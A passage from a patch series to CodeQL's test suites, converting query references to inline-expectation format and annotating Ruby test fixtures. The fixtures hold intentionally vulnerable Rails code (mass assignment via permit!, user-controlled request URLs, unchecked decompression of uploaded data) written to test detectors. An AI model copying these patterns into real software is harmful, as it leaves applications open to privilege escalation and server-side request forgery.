test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | -| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | -| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | -| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref index 89dbc405a3ae..d60d17065b7d 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref @@ -1 +1,2 @@ -queries/security/cwe-915/MassAssignment.ql \ No newline at end of file +query: queries/security/cwe-915/MassAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-915/test.rb b/ruby/ql/test/query-tests/security/cwe-915/test.rb index c72ad536ef73..6af19ca39d4f 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/test.rb +++ b/ruby/ql/test/query-tests/security/cwe-915/test.rb @@ -5,7 +5,7 @@ class User < ApplicationRecord class UserController < ActionController::Base def create # BAD: arbitrary params are permitted to be used for this assignment - User.new(user_params).save! + User.new(user_params).save! # $ Alert end def create2 @@ -15,42 +15,42 @@ def create2 def create3 # each BAD - User.build(user_params) - User.create(user_params) - User.create!(user_params) - User.insert(user_params) - User.insert!(user_params) + User.build(user_params) # $ Alert + User.create(user_params) # $ Alert + User.create!(user_params) # $ Alert + User.insert(user_params) # $ Alert + User.insert!(user_params) # $ Alert User.insert_all([user_params]) User.insert_all!([user_params]) - User.update(user_params) - User.update(7, user_params) - User.update!(user_params) - User.update!(7, user_params) - User.upsert(user_params) + User.update(user_params) # $ Alert + User.update(7, user_params) # $ Alert + User.update!(user_params) # $ Alert + User.update!(7, user_params) # $ Alert + User.upsert(user_params) # $ Alert User.upsert([user_params]) - User.find_or_create_by(user_params) - User.find_or_create_by!(user_params) - User.find_or_initialize_by(user_params) - User.create_or_find_by(user_params) - User.create_or_find_by!(user_params) - User.create_with(user_params) + User.find_or_create_by(user_params) # $ Alert + User.find_or_create_by!(user_params) # $ Alert + User.find_or_initialize_by(user_params) # $ Alert + User.create_or_find_by(user_params) # $ Alert + User.create_or_find_by!(user_params) # $ Alert + User.create_with(user_params) # $ Alert user = User.where(name:"abc") user.update(user_params) end def user_params - params.require(:user).permit! + params.require(:user).permit! # $ Source end def create4 - x = params[:user] + x = params[:user] # $ Source x.permit! - User.new(x) # BAD + User.new(x) # BAD # $ Alert User.new(x.permit(:name,:address)) # GOOD - User.new(params.permit(user: {})) # BAD - User.new(params.permit(user: [:name, :address, {friends:{}}])) # BAD - User.new(params.to_unsafe_h) # BAD + User.new(params.permit(user: {})) # BAD # $ Alert + User.new(params.permit(user: [:name, :address, {friends:{}}])) # BAD # $ Alert + User.new(params.to_unsafe_h) # BAD # $ Alert User.new(params.permit(user: [:name, :address]).to_unsafe_h) # GOOD end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected index c97ff12fc3d0..26740b5e3f20 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected @@ -1,3 +1,7 @@ +#select +| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | +| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | +| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | edges | ServerSideRequestForgery.rb:10:9:10:28 | users_service_domain | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | provenance | AdditionalTaintStep | | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:10:32:10:60 | ...[...] | provenance | | @@ -14,7 +18,3 @@ nodes | ServerSideRequestForgery.rb:20:45:20:50 | call to params | semmle.label | call to params | | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | semmle.label | ...[...] | subpaths -#select -| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | -| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | -| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref index 34f3a2952f27..615ca40af22a 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref @@ -1 +1,2 @@ -queries/security/cwe-918/ServerSideRequestForgery.ql +query: queries/security/cwe-918/ServerSideRequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb index ff99ffe1801c..f2ff6825b7d4 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb @@ -7,17 +7,17 @@ def create user = params[:user_id] # BAD - user can control the entire URL of the request - users_service_domain = params[:users_service_domain] - response = Excon.post("#{users_service_domain}/logins", body: {user_id: user}).body + users_service_domain = params[:users_service_domain] # $ Source + response = Excon.post("#{users_service_domain}/logins", body: {user_id: user}).body # $ Alert token = JSON.parse(response)["token"] # BAD - user can control the entire URL for the request using Faraday library - conn = Faraday.new(url: params[:url]) + conn = Faraday.new(url: params[:url]) # $ Alert resp = conn.post token = JSON.parse(resp)["token"] # BAD - user can control the entire URL for the request using Faraday::Connection library - conn = Faraday::Connection.new(url: params[:url]) + conn = Faraday::Connection.new(url: params[:url]) # $ Alert resp = conn.post token = JSON.parse(resp)["token"] diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected index 20be59524bfa..67bfd8f8762d 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected @@ -1,3 +1,6 @@ +#select +| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | +| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | edges | decompression_api.rb:4:9:4:12 | path | decompression_api.rb:5:31:5:34 | path | provenance | | | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:4:16:4:28 | ...[...] | provenance | | @@ -11,6 +14,3 @@ nodes | decompression_api.rb:15:31:15:36 | call to params | semmle.label | call to params | | decompression_api.rb:15:31:15:43 | ...[...] | semmle.label | ...[...] | subpaths -#select -| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | -| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref index feb45b822208..4d63d1ce6246 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref @@ -1 +1,2 @@ -experimental/decompression-api/DecompressionApi.ql \ No newline at end of file +query: experimental/decompression-api/DecompressionApi.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb b/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb index 6c1daa144e2f..18da3c4bc023 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb +++ b/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb @@ -1,8 +1,8 @@ class TestController < ActionController::Base # this should get picked up def unsafe_zlib_unzip - path = params[:file] - Zlib::Inflate.inflate(path) + path = params[:file] # $ Source + Zlib::Inflate.inflate(path) # $ Alert end # this should not get picked up @@ -12,7 +12,7 @@ def safe_zlib_unzip # this should get picked up def unsafe_zlib_unzip - Zip::File.open_buffer(params[:file]) + Zip::File.open_buffer(params[:file]) # $ Alert end # this should not get picked up diff --git a/ruby/ql/test/query-tests/summary/LinesOfCode.qlref b/ruby/ql/test/query-tests/summary/LinesOfCode.qlref index 84278cfc96b7..0478c9ec2f5c 100644 --- a/ruby/ql/test/query-tests/summary/LinesOfCode.qlref +++ b/ruby/ql/test/query-tests/summary/LinesOfCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfCode.ql \ No newline at end of file +query: queries/summary/LinesOfCode.ql diff --git a/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref b/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref index 4114db632a26..45caa1400d7d 100644 --- a/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref +++ b/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfUserCode.ql \ No newline at end of file +query: queries/summary/LinesOfUserCode.ql diff --git a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref index 8407cd817f14..e1f3141a439d 100644 --- a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref +++ b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeAccessPaths.ql +query: utils/modeleditor/FrameworkModeAccessPaths.ql diff --git a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref index 91b8e89b85f5..ec216021687b 100644 --- a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref +++ b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeEndpoints.ql +query: utils/modeleditor/FrameworkModeEndpoints.ql diff --git a/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref b/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref index 2ad420fa620e..07e780838762 100644 --- a/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref +++ b/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref @@ -1 +1 @@ -queries/modeling/GenerateModel.ql +query: queries/modeling/GenerateModel.ql From cf1e0641312e0a16f878afa4729231b6c6be14c6 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:58:41 +0200 Subject: [PATCH 07/15] rust --- rust/ql/integration-tests/hello-project/ExtractionErrors.qlref | 2 +- .../ql/integration-tests/hello-project/ExtractionWarnings.qlref | 2 +- rust/ql/integration-tests/hello-project/summary.qlref | 2 +- .../ql/integration-tests/hello-workspace/ExtractionErrors.qlref | 2 +- .../integration-tests/hello-workspace/ExtractionWarnings.qlref | 2 +- rust/ql/integration-tests/hello-workspace/summary.qlref | 2 +- rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref | 2 +- rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref | 2 +- rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref | 2 +- .../query-tests/diagnostics/DataFlowConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref | 2 +- rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref | 2 +- rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref | 2 +- .../test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref | 2 +- rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref | 2 +- rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref | 2 +- rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref | 2 +- 21 files changed, 21 insertions(+), 21 deletions(-) diff --git a/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref b/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref index ba4f854d6a10..9169d655e25c 100644 --- a/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref +++ b/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionErrors.ql +query: queries/diagnostics/ExtractionErrors.ql diff --git a/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref b/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref index ff6e566d20a7..24af39e23262 100644 --- a/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref +++ b/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionWarnings.ql +query: queries/diagnostics/ExtractionWarnings.ql diff --git a/rust/ql/integration-tests/hello-project/summary.qlref b/rust/ql/integration-tests/hello-project/summary.qlref index 926fc7903911..1e9346a81a8c 100644 --- a/rust/ql/integration-tests/hello-project/summary.qlref +++ b/rust/ql/integration-tests/hello-project/summary.qlref @@ -1 +1 @@ -queries/summary/SummaryStatsReduced.ql +query: queries/summary/SummaryStatsReduced.ql diff --git a/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref b/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref index ba4f854d6a10..9169d655e25c 100644 --- a/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref +++ b/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionErrors.ql +query: queries/diagnostics/ExtractionErrors.ql diff --git a/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref b/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref index ff6e566d20a7..24af39e23262 100644 --- a/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref +++ b/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionWarnings.ql +query: queries/diagnostics/ExtractionWarnings.ql diff --git a/rust/ql/integration-tests/hello-workspace/summary.qlref b/rust/ql/integration-tests/hello-workspace/summary.qlref index 926fc7903911..1e9346a81a8c 100644 --- a/rust/ql/integration-tests/hello-workspace/summary.qlref +++ b/rust/ql/integration-tests/hello-workspace/summary.qlref @@ -1 +1 @@ -queries/summary/SummaryStatsReduced.ql +query: queries/summary/SummaryStatsReduced.ql diff --git a/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref b/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref index ee3c14c56f15..d8d07ef1184f 100644 --- a/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref +++ b/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref @@ -1 +1 @@ -utils/PrintAst.ql +query: utils/PrintAst.ql diff --git a/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref b/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref index ee3c14c56f15..d8d07ef1184f 100644 --- a/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref +++ b/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref @@ -1 +1 @@ -utils/PrintAst.ql +query: utils/PrintAst.ql diff --git a/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref index 68d587b883e3..8b940c0d01ec 100644 --- a/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref +++ b/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref @@ -1 +1 @@ -queries/diagnostics/AstConsistencyCounts.ql +query: queries/diagnostics/AstConsistencyCounts.ql diff --git a/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref index 6e7ffa8aaa9d..fb180bf64bb2 100644 --- a/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref +++ b/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref @@ -1 +1 @@ -queries/diagnostics/CfgConsistencyCounts.ql +query: queries/diagnostics/CfgConsistencyCounts.ql diff --git a/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref index 128d80b22913..c3b3fb00c93c 100644 --- a/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref +++ b/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref @@ -1 +1 @@ -queries/diagnostics/DataFlowConsistencyCounts.ql +query: queries/diagnostics/DataFlowConsistencyCounts.ql diff --git a/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref b/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref index cd1996e606b6..ed3e1b70d3ec 100644 --- a/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref +++ b/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractedFiles.ql +query: queries/diagnostics/ExtractedFiles.ql diff --git a/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref b/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref index ffbdb0a7b1b5..9169d655e25c 100644 --- a/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref +++ b/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionErrors.ql \ No newline at end of file +query: queries/diagnostics/ExtractionErrors.ql diff --git a/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref b/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref index ff6e566d20a7..24af39e23262 100644 --- a/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref +++ b/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionWarnings.ql +query: queries/diagnostics/ExtractionWarnings.ql diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref index 6b283550e622..0478c9ec2f5c 100644 --- a/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref +++ b/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfCode.ql +query: queries/summary/LinesOfCode.ql diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref index 73feb9152774..45caa1400d7d 100644 --- a/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref +++ b/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfUserCode.ql +query: queries/summary/LinesOfUserCode.ql diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref index da3e8f72ed9a..ffc0095c1a05 100644 --- a/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref +++ b/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref @@ -1 +1 @@ -queries/summary/LinesOfUserCodeInFiles.ql +query: queries/summary/LinesOfUserCodeInFiles.ql diff --git a/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref index 40242e81c245..f43cb8682910 100644 --- a/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref +++ b/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref @@ -1 +1 @@ -queries/diagnostics/SsaConsistencyCounts.ql +query: queries/diagnostics/SsaConsistencyCounts.ql diff --git a/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref b/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref index 926fc7903911..1e9346a81a8c 100644 --- a/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref +++ b/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref @@ -1 +1 @@ -queries/summary/SummaryStatsReduced.ql +query: queries/summary/SummaryStatsReduced.ql diff --git a/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref b/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref index e02770f843d7..119addad1880 100644 --- a/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref +++ b/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref @@ -1 +1 @@ -queries/diagnostics/UnextractedElements.ql +query: queries/diagnostics/UnextractedElements.ql diff --git a/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref b/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref index 77f337e27032..3435d38ebe72 100644 --- a/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref +++ b/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref @@ -1 +1 @@ -queries/diagnostics/UnresolvedMacroCalls.ql +query: queries/diagnostics/UnresolvedMacroCalls.ql From 212e9d07fd9116ace47e8009a6f2b3ce28e25378 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:58:52 +0200 Subject: [PATCH 08/15] Swift --- .../decl/CapturedDecl/PrintAst.qlref | 2 +- .../extractor-tests/updates/PrintAst.qlref | 2 +- swift/ql/test/library-tests/ast/Errors.qlref | 2 +- .../elements/expr/methodlookup/PrintAst.qlref | 2 +- .../library-tests/hidden-ast/PrintAst.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../SuccessfullyExtractedLines.qlref | 2 +- .../CWE-020/IncompleteHostnameRegex.qlref | 3 +- .../Security/CWE-020/MissingRegexAnchor.qlref | 3 +- .../Security/CWE-020/SemiAnchoredRegex.swift | 64 ++-- .../Security/CWE-020/UnanchoredUrlRegex.swift | 32 +- .../query-tests/Security/CWE-020/test.swift | 44 +-- .../UnsafeUnpack/UnsafeUnpack.expected | 6 +- .../CWE-022/UnsafeUnpack/UnsafeUnpack.qlref | 3 +- .../CWE-022/UnsafeUnpack/UnsafeUnpack.swift | 6 +- .../Security/CWE-078/CommandInjection.qlref | 2 +- .../CWE-079/UnsafeWebViewFetch.expected | 38 +-- .../Security/CWE-079/UnsafeWebViewFetch.qlref | 3 +- .../Security/CWE-079/UnsafeWebViewFetch.swift | 40 +-- .../query-tests/Security/CWE-089/GRDB.swift | 192 ++++++------ .../query-tests/Security/CWE-089/SQLite.swift | 32 +- .../Security/CWE-089/SqlInjection.expected | 228 +++++++------- .../Security/CWE-089/SqlInjection.qlref | 3 +- .../query-tests/Security/CWE-089/other.swift | 14 +- .../Security/CWE-089/sqlite3_c_api.swift | 20 +- .../Security/CWE-116/BadTagFilter.qlref | 3 +- .../query-tests/Security/CWE-116/test.swift | 64 ++-- .../StaticInitializationVector.expected | 60 ++-- .../CWE-1204/StaticInitializationVector.qlref | 3 +- .../Security/CWE-1204/rncryptor.swift | 24 +- .../query-tests/Security/CWE-1204/test.swift | 46 +-- .../query-tests/Security/CWE-1333/ReDoS.qlref | 3 +- .../query-tests/Security/CWE-1333/ReDoS.swift | 16 +- .../CWE-134/UncontrolledFormatString.expected | 48 +-- .../CWE-134/UncontrolledFormatString.qlref | 3 +- .../CWE-134/UncontrolledFormatString.swift | 48 +-- .../CWE-135/StringLengthConflation.qlref | 2 +- .../CWE-259/ConstantPassword.expected | 54 ++-- .../Security/CWE-259/ConstantPassword.qlref | 3 +- .../Security/CWE-259/rncryptor.swift | 38 +-- .../query-tests/Security/CWE-259/test.swift | 20 +- .../CWE-311/CleartextStorageDatabase.expected | 280 +++++++++--------- .../CWE-311/CleartextStorageDatabase.qlref | 3 +- .../CWE-311/CleartextTransmission.expected | 64 ++-- .../CWE-311/CleartextTransmission.qlref | 3 +- .../query-tests/Security/CWE-311/SQLite.swift | 74 ++--- .../Security/CWE-311/sqlite3_c_api.swift | 10 +- .../Security/CWE-311/testAlamofire.swift | 6 +- .../Security/CWE-311/testCoreData.swift | 40 +-- .../Security/CWE-311/testCoreData2.swift | 56 ++-- .../Security/CWE-311/testGRDB.swift | 102 +++---- .../Security/CWE-311/testRealm.swift | 10 +- .../Security/CWE-311/testRealm2.swift | 14 +- .../Security/CWE-311/testSend.swift | 36 +-- .../Security/CWE-311/testURL.swift | 30 +- .../CleartextStoragePreferences.expected | 32 +- .../CWE-312/CleartextStoragePreferences.qlref | 3 +- .../testNSUbiquitousKeyValueStore.swift | 24 +- .../Security/CWE-312/testUserDefaults.swift | 26 +- .../CWE-321/HardcodedEncryptionKey.qlref | 2 +- .../Security/CWE-327/ECBEncryption.expected | 20 +- .../Security/CWE-327/ECBEncryption.qlref | 3 +- .../query-tests/Security/CWE-327/test.swift | 22 +- .../CWE-328/WeakPasswordHashing.expected | 98 +++--- .../CWE-328/WeakPasswordHashing.qlref | 3 +- .../CWE-328/WeakSensitiveDataHashing.expected | 74 ++--- .../CWE-328/WeakSensitiveDataHashing.qlref | 3 +- .../Security/CWE-328/testCryptoKit.swift | 110 +++---- .../Security/CWE-328/testCryptoSwift.swift | 68 ++--- .../Security/CWE-730/RegexInjection.expected | 48 +-- .../Security/CWE-730/RegexInjection.qlref | 3 +- .../query-tests/Security/CWE-730/tests.swift | 48 +-- .../Security/CWE-757/InsecureTLS.qlref | 2 +- .../Security/CWE-760/ConstantSalt.expected | 38 +-- .../Security/CWE-760/ConstantSalt.qlref | 3 +- .../Security/CWE-760/rncryptor.swift | 24 +- .../query-tests/Security/CWE-760/test.swift | 20 +- .../InsufficientHashIterations.expected | 10 +- .../CWE-916/InsufficientHashIterations.qlref | 3 